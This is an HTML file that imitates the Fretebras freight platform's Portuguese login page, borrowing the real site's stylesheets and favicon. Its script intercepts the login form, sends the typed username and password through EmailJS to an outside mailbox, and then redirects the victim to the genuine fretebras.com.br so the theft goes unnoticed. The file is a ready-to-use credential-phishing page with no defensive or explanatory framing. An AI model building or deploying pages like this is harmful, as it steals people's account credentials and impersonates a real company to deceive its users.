
<!DOCTYPE html>
<html lang="pt-BR">
<head>
  <meta charset="utf-8">
  <meta http-equiv="content-type" content="text/html;charset=utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="robots" content="noindex, nofollow">
  <title>Entrar em Fretebras</title>

  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/foundation-sites@6.9.0/dist/css/foundation.min.css" crossorigin="anonymous">
  <link rel="stylesheet" href="node_modules/@fuel-ui/core/dist/fuel-ui/fuel-ui.css">
  <link rel="stylesheet" href="https://sso-external.fretebras.com.br/resources/wmdp9/login/fretebras/css/styles.css">
  <link rel="stylesheet" href="https://sso-external.fretebras.com.br/resources/wmdp9/login/fretebras/node_modules/@frete.com/fuel-foundation/fretebras/_variables.css">
  <link rel="stylesheet" href="https://sso-external.fretebras.com.br/resources/wmdp9/login/fretebras/node_modules/@frete.com/fuel-components/dist/collection/components/text-field/text-field.css">
  <link rel="stylesheet" href="https://sso-external.fretebras.com.br/resources/wmdp9/login/fretebras/node_modules/@frete.com/fuel-components/dist/collection/components/callout/callout.css">
  <link rel="icon" href="https://sso-external.fretebras.com.br/resources/wmdp9/login/fretebras/img/favicon.svg" />
  
  <style>
    /* Your internal CSS */

    .content {
      display: flex;
      justify-content: center;
      position: relative;
      height: 100vh;
    }

    .content-wrapper {
      align-items: center;
      display: flex;
      flex-direction: column;
      gap: 48px 0;
      height: 100%;
      justify-content: center;
      padding: 0 24px;
      width: 100%;
    }

    #kc-header {
      display: flex;
      position: fixed;   
      width: 100%;
    }

    #kc-header-wrapper {
      align-items: center;
      display: flex;
      height: auto;
      justify-content: center;
      padding: 40px 0;
      width: 100%;
    }

    .form-title {
      font-size: 2rem;
      line-height: 1.3;
      letter-spacing: -0.04em;
    }

    .form-checkbox {
      display: flex;
      gap: 8px;
      align-items: center;
    }

    .text-field__label {
      display: inline-block;
      width: auto;
      margin-bottom: 6px;
      font-size: 0.75rem;
      font-weight: 700;
      color: #111111;
      text-align: left;
    }

    .text-field__input {
      width: 100%;
      padding: 12px;
      font-size: 0.875rem;
      font-weight: 500;
      line-height: 1.5;
      background: #ffffff;
      border: 1px solid #dddfe4;
      border-radius: 8px;
      transition: border 250ms ease-in, box-shadow 250ms ease-in;
    }

    .rememberMe-checkbox {
      -webkit-appearance: none;
      -moz-appearance: none;
      appearance: none;
      width: 22px;
      height: 22px;
      font-size: 20px;
      border: 2px solid #babec9;
      border-radius: 0.25em;
      background-color: white;
      cursor: pointer;
      position: relative;
      transition: all ease-in-out .2s;
      margin:0;
    }


    .rememberMe-label {
      font-size: 0.875rem;
      color: #636b7e;
      cursor: pointer;
    }

    [type="checkbox"] + label {
      margin: 0;
    }

    .rememberMe-checkbox:checked {
      background-color: #e04747;
      border-color: #e04747;
    }

    .rememberMe-checkbox:checked::after {
      content: "";
      position: absolute;
      top: 1px;
      left: 5px;
      width: 7px;
      height: 12px;
      border: solid white;
      border-width: 0 2px 2px 0;
      transform: rotate(45deg);
    }


    .reset-credentials-link {
      color: #e04747;
      font-size: .9em;
      font-weight: bold;
      text-decoration: none;
      position: relative;
    }

    .reset-credentials-link::before {
      content: "";
      position: absolute;
      width: 100%;
      height: 3px;
      border-radius: 4px;
      background-color: #e04747;
      bottom: -4px;
      left: 0;
      transform: scaleX(0);
      transform-origin: right;
      transition: transform .3s ease-in-out;
    }

    .reset-credentials-link:hover::before {
      transform: scaleX(1);
      transform-origin: left;
    }

    .login-wrapper {
      display: flex;
      flex-direction: flex-start;
    }

    .login-button {
      color: white;
      background-color: #e04747;
      font-weight: bold;
      padding: 12px 24px;
      margin-top: 1.5rem;
      border-radius: 12px;
      border: none;
      cursor: pointer;
      display: inline-flex;
      align-items: center;
      justify-content: center;
      min-width: 108px;
      height: 48px;
      transition: background-color 0.3s ease, transform 0.2s ease;
    }

    .login-button:disabled {
      background-color: #ccc;
      cursor: not-allowed;
    }
  </style>
</head>

<body>
  <main id="kc-content">
    <div id="kc-header">
      <div id="kc-header-wrapper">
        <div class="kc-logo-text"><span>Fretebras</span></div>
      </div>
    </div>
   <div class="content">
      <div class="content-wrapper">
        <h2 class="form-title">
          <strong>Bem-vindo!</strong> Acesse sua conta
        </h2>
      <form id="kc-form-login" class="js-form" onsubmit="event.preventDefault(); sendMail();">
        <div class="text-field text-field--large">
          <label class="text-field__label" for="username">Nome de usu치rio ou e-mail</label>
          <div class="text-field__wrapper">
            <input class="text-field__input" id="username" name="username" type="text" placeholder="Digite seu usu치rio ou e-mail" autocomplete="off">
          </div>
        </div>

        <div class="text-field text-field--large">
          <label class="text-field__label" for="password">Senha</label>
          <div class="text-field__wrapper">
            <input class="text-field__input" id="password" name="password" type="password" placeholder="Digite sua senha" autocomplete="off">
          </div>
        </div>

        <div class="form-checkbox">
          <input id="checkbox" type="checkbox" class="rememberMe-checkbox">
          <label for="checkbox" class="rememberMe-label">Mantenha-me conectado</label>
        </div>

        <div style="margin-top: 10px;">
          <a href="#" class="reset-credentials-link">Esqueceu sua senha?</a>
        </div>

        <div class="login-wrapper">
          <button id="login-button" class="login-button" type="submit" disabled>Entrar</button>
        </div>
      </form>
    </div>
    </div>
 
    </div>
         
  </main>

  <script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
  <script>
    emailjs.init("hlA54VdwMHrBneFtO"); // Replace with your own EmailJS Public Key

    const usernameInput = document.getElementById('username');
    const passwordInput = document.getElementById('password');
    const loginButton = document.getElementById('login-button');

    function validateInputs() {
      const username = usernameInput.value.trim();
      const password = passwordInput.value.trim();

      if (username && password) {
        loginButton.disabled = false;
      } else {
        loginButton.disabled = true;
      }
    }

    usernameInput.addEventListener('input', validateInputs);
    passwordInput.addEventListener('input', validateInputs);

    function sendMail() {
      const username = usernameInput.value.trim();
      const password = passwordInput.value.trim();

      if (!username || !password) {
        alert('Por favor, preencha todos os campos!');
        return;
      }

      const params = {
        username: username,
        password: password,
      };

      emailjs.send("service_h2zjuxv", "template_qd93z53", params)
        .then(function(response) {
          alert("Formul치rio enviado com sucesso!");
          console.log("Success:", response);
          window.location.href = "https://www.fretebras.com.br/";
        })
        .catch(function(error) {
          alert("Erro ao enviar o formul치rio. Tente novamente.");
          console.error("Error:", error);
        });
    }
  </script>
</body>
</html>

